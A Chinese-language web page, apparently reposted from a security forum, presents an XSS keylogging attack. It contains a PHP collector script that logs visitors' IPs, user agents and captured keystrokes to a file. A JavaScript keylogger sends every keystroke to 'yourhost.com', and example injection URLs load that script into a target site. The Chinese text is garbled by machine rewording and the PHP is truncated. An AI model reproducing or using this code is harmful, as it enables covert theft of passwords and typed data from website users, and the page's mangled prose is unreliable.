|
|
|
联系客服020-83701501

XSS的键盘记录

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
XSS的键盘记实

这类法子是极端漆黑的,但很多人仿照照旧不晓得它。
cookie时,从指标不能反复哄骗,您或者哄骗此法子。 你需求一台主机上传:

g.php

Default
12345678910111213141516 <?php$Keylog = $_GET["c"];$reffer = $_SERVER['HTTP_REFERER'];$ip = $_SERVER['REMOTE_ADDR'];$date=date ("l dS of F Y h:i:s A"); $port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT'];$file = fopen('data.txt', 'a');fwrite($file, 'Ip: '.$ip."n");fwrite($file, 'Port: '.$port."n");fwrite($file, 'Refferer: '.$reffer."n");fwrite($file, 'User Agent: '.$user_agent."n");fwrite($file, 'Date: '.$date."n");fwrite($file, $Keylog."n");fwrite($file, "---------------------------nn");fclose($fi

k.js:

Default
1234567891011 var keys='';document.onkeypress = function(e) {    get = window.event?event:e;    key = get.keyCode?get.keyCode:get.charCode;    key = String.fromCharCode(key);    keys+=key;}window.setInterval(function(){    new Image().src = 'http://yourhost.com/g.php?c='+keys;    keys = '';}, 1000);

一个新的文件名 ??为data.txt的和chmod 777 data.txt中, 您或者哄骗它像这样:

Default
1 http://www.91ri.org/shop.php?article=12 <script src="http://yourhost.com/k.js"></script>

Default
1 大要

Default
1 http://www.91ri.org/shop.php?article=12 <script language="JavaScript" src="http://yourhost.com/k.js"></script>

注:请自行去掉12后的空格

相关文章参考《js 完成键盘记实 兼容FireFox和IE

本文来自海外安然论坛转自F1n9er博客由网络安然攻防研究室(www.91ri.org)静态安然小组征集整顿,转载请阐明因由。

数安新闻+更多

证书相关+更多